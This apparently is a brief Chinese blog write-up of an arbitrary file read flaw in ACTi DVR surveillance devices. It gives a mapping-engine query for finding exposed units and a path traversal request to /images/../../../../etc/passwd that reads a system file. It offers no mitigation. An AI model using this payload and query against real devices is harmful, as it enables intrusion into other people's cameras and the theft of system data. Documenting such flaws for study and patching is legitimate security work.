ACTI-DVR 文件读取漏洞

ACTI 视频监控 images 任意文件读取漏洞

漏洞描述

ACTI 视频监控 存在任意文件读取漏洞

漏洞影响

ACTI摄像头

网络测绘

app="ACTi-视频监控"

漏洞复现

登录页面如下

 

 

文件读取路径:

/images/../../../../../../../../etc/passwd

Burp抓包

 

 暴露出信息。

 

 

End!!!

posted @ 2022-05-20 14:41  我就去睡觉  阅读(392)  评论(0编辑  收藏  举报